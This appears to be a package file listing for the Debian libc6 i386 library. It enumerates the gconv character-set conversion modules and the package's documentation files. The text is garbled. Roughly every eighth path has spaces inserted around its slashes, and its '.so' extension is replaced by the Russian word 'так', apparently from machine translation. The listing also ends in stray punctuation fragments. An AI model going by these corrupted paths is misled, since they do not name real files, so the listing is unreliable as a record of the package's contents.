/usr/lib/i386-linux-gnu/gconv/EBCDIC-PT.so |
/ usr / lib / i386-linux-gnu / gconv / EBCDIC-UK.так |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-US.so |
/usr/lib/i386-linux-gnu/gconv/ECMA-CYRILLIC.so |
/usr/lib/i386-linux-gnu/gconv/EUC-CN.so |
/usr/lib/i386-linux-gnu/gconv/EUC-JISX0213.so |
/usr/lib/i386-linux-gnu/gconv/EUC-JP-MS.so |
/usr/lib/i386-linux-gnu/gconv/EUC-JP.so |
/usr/lib/i386-linux-gnu/gconv/EUC-KR.so |
/ usr / lib / i386-linux-gnu / gconv / EUC-TW.так |
/usr/lib/i386-linux-gnu/gconv/GB18030.so |
/usr/lib/i386-linux-gnu/gconv/GBBIG5.so |
/usr/lib/i386-linux-gnu/gconv/GBGBK.so |
/usr/lib/i386-linux-gnu/gconv/GBK.so |
/usr/lib/i386-linux-gnu/gconv/GEORGIAN-ACADEMY.so |
/usr/lib/i386-linux-gnu/gconv/GEORGIAN-PS.so |
/usr/lib/i386-linux-gnu/gconv/GOST_19768-74.so |
/ usr / lib / i386-linux-gnu / gconv / GREEK-CCITT.так |
/usr/lib/i386-linux-gnu/gconv/GREEK7-OLD.so |
/usr/lib/i386-linux-gnu/gconv/GREEK7.so |
/usr/lib/i386-linux-gnu/gconv/HP-GREEK8.so |
/usr/lib/i386-linux-gnu/gconv/HP-ROMAN8.so |
/usr/lib/i386-linux-gnu/gconv/HP-ROMAN9.so |
/usr/lib/i386-linux-gnu/gconv/HP-THAI8.so |
/usr/lib/i386-linux-gnu/gconv/HP-TURKISH8.so |
/ usr / lib / i386-linux-gnu / gconv / IBM037.так |
/usr/lib/i386-linux-gnu/gconv/IBM038.so |
/usr/lib/i386-linux-gnu/gconv/IBM1004.so |
/usr/lib/i386-linux-gnu/gconv/IBM1008.so |
/usr/lib/i386-linux-gnu/gconv/IBM1008_420.so |
/usr/lib/i386-linux-gnu/gconv/IBM1025.so |
/usr/lib/i386-linux-gnu/gconv/IBM1026.so |
/usr/lib/i386-linux-gnu/gconv/IBM1046.so |
/ usr / lib / i386-linux-gnu / gconv / IBM1047.так |
/usr/lib/i386-linux-gnu/gconv/IBM1097.so |
/usr/lib/i386-linux-gnu/gconv/IBM1112.so |
/usr/lib/i386-linux-gnu/gconv/IBM1122.so |
/usr/lib/i386-linux-gnu/gconv/IBM1123.so |
/usr/lib/i386-linux-gnu/gconv/IBM1124.so |
/usr/lib/i386-linux-gnu/gconv/IBM1129.so |
/usr/lib/i386-linux-gnu/gconv/IBM1130.so |
/ usr / lib / i386-linux-gnu / gconv / IBM1132.так |
/usr/lib/i386-linux-gnu/gconv/IBM1133.so |
/usr/lib/i386-linux-gnu/gconv/IBM1137.so |
/usr/lib/i386-linux-gnu/gconv/IBM1140.so |
/usr/lib/i386-linux-gnu/gconv/IBM1141.so |
/usr/lib/i386-linux-gnu/gconv/IBM1142.so |
/usr/lib/i386-linux-gnu/gconv/IBM1143.so |
/usr/lib/i386-linux-gnu/gconv/IBM1144.so |
/ usr / lib / i386-linux-gnu / gconv / IBM1145.так |
/usr/lib/i386-linux-gnu/gconv/IBM1146.so |
/usr/lib/i386-linux-gnu/gconv/IBM1147.so |
/usr/lib/i386-linux-gnu/gconv/IBM1148.so |
/usr/lib/i386-linux-gnu/gconv/IBM1149.so |
/usr/lib/i386-linux-gnu/gconv/IBM1153.so |
/usr/lib/i386-linux-gnu/gconv/IBM1154.so |
/usr/lib/i386-linux-gnu/gconv/IBM1155.so |
/ usr / lib / i386-linux-gnu / gconv / IBM1156.так |
/usr/lib/i386-linux-gnu/gconv/IBM1157.so |
/usr/lib/i386-linux-gnu/gconv/IBM1158.so |
/usr/lib/i386-linux-gnu/gconv/IBM1160.so |
/usr/lib/i386-linux-gnu/gconv/IBM1161.so |
/usr/lib/i386-linux-gnu/gconv/IBM1162.so |
/usr/lib/i386-linux-gnu/gconv/IBM1163.so |
/usr/lib/i386-linux-gnu/gconv/IBM1164.so |
/ usr / lib / i386-linux-gnu / gconv / IBM1166.так |
/usr/lib/i386-linux-gnu/gconv/IBM1167.so |
/usr/lib/i386-linux-gnu/gconv/IBM12712.so |
/usr/lib/i386-linux-gnu/gconv/IBM1364.so |
/usr/lib/i386-linux-gnu/gconv/IBM1371.so |
/usr/lib/i386-linux-gnu/gconv/IBM1388.so |
/usr/lib/i386-linux-gnu/gconv/IBM1390.so |
/usr/lib/i386-linux-gnu/gconv/IBM1399.so |
/ usr / lib / i386-linux-gnu / gconv / IBM16804.так |
/usr/lib/i386-linux-gnu/gconv/IBM256.so |
/usr/lib/i386-linux-gnu/gconv/IBM273.so |
/usr/lib/i386-linux-gnu/gconv/IBM274.so |
/usr/lib/i386-linux-gnu/gconv/IBM275.so |
/usr/lib/i386-linux-gnu/gconv/IBM277.so |
/usr/lib/i386-linux-gnu/gconv/IBM278.so |
/usr/lib/i386-linux-gnu/gconv/IBM280.so |
/ usr / lib / i386-linux-gnu / gconv / IBM281.так |
/usr/lib/i386-linux-gnu/gconv/IBM284.so |
/usr/lib/i386-linux-gnu/gconv/IBM285.so |
/usr/lib/i386-linux-gnu/gconv/IBM290.so |
/usr/lib/i386-linux-gnu/gconv/IBM297.so |
/usr/lib/i386-linux-gnu/gconv/IBM420.so |
/usr/lib/i386-linux-gnu/gconv/IBM423.so |
/usr/lib/i386-linux-gnu/gconv/IBM424.so |
/ usr / lib / i386-linux-gnu / gconv / IBM437.так |
/usr/lib/i386-linux-gnu/gconv/IBM4517.so |
/usr/lib/i386-linux-gnu/gconv/IBM4899.so |
/usr/lib/i386-linux-gnu/gconv/IBM4909.so |
/usr/lib/i386-linux-gnu/gconv/IBM4971.so |
/usr/lib/i386-linux-gnu/gconv/IBM500.so |
/usr/lib/i386-linux-gnu/gconv/IBM5347.so |
/usr/lib/i386-linux-gnu/gconv/IBM803.so |
/ usr / lib / i386-linux-gnu / gconv / IBM850.так |
/usr/lib/i386-linux-gnu/gconv/IBM851.so |
/usr/lib/i386-linux-gnu/gconv/IBM852.so |
/usr/lib/i386-linux-gnu/gconv/IBM855.so |
/usr/lib/i386-linux-gnu/gconv/IBM856.so |
/usr/lib/i386-linux-gnu/gconv/IBM857.so |
/usr/lib/i386-linux-gnu/gconv/IBM858.so |
/usr/lib/i386-linux-gnu/gconv/IBM860.so |
/ usr / lib / i386-linux-gnu / gconv / IBM861.так |
/usr/lib/i386-linux-gnu/gconv/IBM862.so |
/usr/lib/i386-linux-gnu/gconv/IBM863.so |
/usr/lib/i386-linux-gnu/gconv/IBM864.so |
/usr/lib/i386-linux-gnu/gconv/IBM865.so |
/usr/lib/i386-linux-gnu/gconv/IBM866.so |
/usr/lib/i386-linux-gnu/gconv/IBM866NAV.so |
/usr/lib/i386-linux-gnu/gconv/IBM868.so |
/ usr / lib / i386-linux-gnu / gconv / IBM869.так |
/usr/lib/i386-linux-gnu/gconv/IBM870.so |
/usr/lib/i386-linux-gnu/gconv/IBM871.so |
/usr/lib/i386-linux-gnu/gconv/IBM874.so |
/usr/lib/i386-linux-gnu/gconv/IBM875.so |
/usr/lib/i386-linux-gnu/gconv/IBM880.so |
/usr/lib/i386-linux-gnu/gconv/IBM891.so |
/usr/lib/i386-linux-gnu/gconv/IBM901.so |
/ usr / lib / i386-linux-gnu / gconv / IBM902.так |
/usr/lib/i386-linux-gnu/gconv/IBM903.so |
/usr/lib/i386-linux-gnu/gconv/IBM9030.so |
/usr/lib/i386-linux-gnu/gconv/IBM904.so |
/usr/lib/i386-linux-gnu/gconv/IBM905.so |
/usr/lib/i386-linux-gnu/gconv/IBM9066.so |
/usr/lib/i386-linux-gnu/gconv/IBM918.so |
/usr/lib/i386-linux-gnu/gconv/IBM921.so |
/ usr / lib / i386-linux-gnu / gconv / IBM922.так |
/usr/lib/i386-linux-gnu/gconv/IBM930.so |
/usr/lib/i386-linux-gnu/gconv/IBM932.so |
/usr/lib/i386-linux-gnu/gconv/IBM933.so |
/usr/lib/i386-linux-gnu/gconv/IBM935.so |
/usr/lib/i386-linux-gnu/gconv/IBM937.so |
/usr/lib/i386-linux-gnu/gconv/IBM939.so |
/usr/lib/i386-linux-gnu/gconv/IBM943.so |
/ usr / lib / i386-linux-gnu / gconv / IBM9448.так |
/usr/lib/i386-linux-gnu/gconv/IEC_P27-1.so |
/usr/lib/i386-linux-gnu/gconv/INIS-8.so |
/usr/lib/i386-linux-gnu/gconv/INIS-CYRILLIC.so |
/usr/lib/i386-linux-gnu/gconv/INIS.so |
/usr/lib/i386-linux-gnu/gconv/ISIRI-3342.so |
/usr/lib/i386-linux-gnu/gconv/ISO-2022-CN-EXT.so |
/ usr / lib / i386-linux-gnu / gconv / ISO-2022-CN.так |
/usr/lib/i386-linux-gnu/gconv/ISO-2022-JP-3.so |
/usr/lib/i386-linux-gnu/gconv/ISO-2022-JP.so |
/usr/lib/i386-linux-gnu/gconv/ISO-2022-KR.so |
/usr/lib/i386-linux-gnu/gconv/ISO-IR-197.so |
/usr/lib/i386-linux-gnu/gconv/ISO-IR-209.so |
/usr/lib/i386-linux-gnu/gconv/ISO646.so |
/ usr / lib / i386-linux-gnu / gconv / ISO8859-1.так |
/usr/lib/i386-linux-gnu/gconv/ISO8859-10.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-11.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-13.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-14.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-15.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-16.so |
/ usr / lib / i386-linux-gnu / gconv / ISO8859-2.так |
/usr/lib/i386-linux-gnu/gconv/ISO8859-3.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-4.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-5.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-6.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-7.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-8.so |
/usr/lib/i386-linux-gnu/gconv/ISO8859-9.so |
/ usr / lib / i386-linux-gnu / gconv / ISO8859-9E.так |
/usr/lib/i386-linux-gnu/gconv/ISO_10367-BOX.so |
/usr/lib/i386-linux-gnu/gconv/ISO_11548-1.so |
/usr/lib/i386-linux-gnu/gconv/ISO_2033.so |
/usr/lib/i386-linux-gnu/gconv/ISO_5427-EXT.so |
/usr/lib/i386-linux-gnu/gconv/ISO_5427.so |
/usr/lib/i386-linux-gnu/gconv/ISO_5428.so |
/ usr / lib / i386-linux-gnu / gconv / ISO_6937-2.так |
/usr/lib/i386-linux-gnu/gconv/ISO_6937.so |
/usr/lib/i386-linux-gnu/gconv/JOHAB.so |
/usr/lib/i386-linux-gnu/gconv/KOI-8.so |
/usr/lib/i386-linux-gnu/gconv/KOI8-R.so |
/usr/lib/i386-linux-gnu/gconv/KOI8-RU.so |
/usr/lib/i386-linux-gnu/gconv/KOI8-T.so |
/usr/lib/i386-linux-gnu/gconv/KOI8-U.so |
/ usr / lib / i386-linux-gnu / gconv / LATIN-GREEK-1.так |
/usr/lib/i386-linux-gnu/gconv/LATIN-GREEK.so |
/usr/lib/i386-linux-gnu/gconv/MAC-CENTRALEUROPE.so |
/usr/lib/i386-linux-gnu/gconv/MAC-IS.so |
/usr/lib/i386-linux-gnu/gconv/MAC-SAMI.so |
/usr/lib/i386-linux-gnu/gconv/MAC-UK.so |
/usr/lib/i386-linux-gnu/gconv/MACINTOSH.so |
/usr/lib/i386-linux-gnu/gconv/MIK.so |
/ usr / lib / i386-linux-gnu / gconv / NATS-DANO.так |
/usr/lib/i386-linux-gnu/gconv/NATS-SEFI.so |
/usr/lib/i386-linux-gnu/gconv/PT154.so |
/usr/lib/i386-linux-gnu/gconv/RK1048.so |
/usr/lib/i386-linux-gnu/gconv/SAMI-WS2.so |
/usr/lib/i386-linux-gnu/gconv/SHIFT_JISX0213.so |
/usr/lib/i386-linux-gnu/gconv/SJIS.so |
/usr/lib/i386-linux-gnu/gconv/T.61.so |
/ usr / lib / i386-linux-gnu / gconv / TCVN5712-1.так |
/usr/lib/i386-linux-gnu/gconv/TIS-620.so |
/usr/lib/i386-linux-gnu/gconv/TSCII.so |
/usr/lib/i386-linux-gnu/gconv/UHC.so |
/usr/lib/i386-linux-gnu/gconv/UNICODE.so |
/usr/lib/i386-linux-gnu/gconv/UTF-16.so |
/usr/lib/i386-linux-gnu/gconv/UTF-32.so |
/usr/lib/i386-linux-gnu/gconv/UTF-7.so |
/ usr / lib / i386-linux-gnu / gconv / VISCII.так |
/ usr / lib / i386-linux-gnu / gconv / gconv-modules |
/usr/lib/i386-linux-gnu/gconv/gconv-modules.cache |
/usr/lib/i386-linux-gnu/gconv/libCNS.so |
/usr/lib/i386-linux-gnu/gconv/libGB.so |
/usr/lib/i386-linux-gnu/gconv/libISOIR165.so |
/usr/lib/i386-linux-gnu/gconv/libJIS.so |
/usr/lib/i386-linux-gnu/gconv/libJISX0213.so |
/ usr / lib / i386-linux-gnu / gconv / libKSC.так |
/usr/share/doc/libc6/NEWS.Debian.gz |
/usr/share/doc/libc6/NEWS.gz |
/usr/share/doc/libc6/README.Debian.gz |
/usr/share/doc/libc6/README.hesiod.gz |
/usr/share/doc/libc6/changelog.Debian.gz |
/usr/share/doc/libc6/changelog.gz |
/ usr / share / doc / libc6 / copyright |
/ usr / share / lintian / overrides / libc6 |
.
! |
.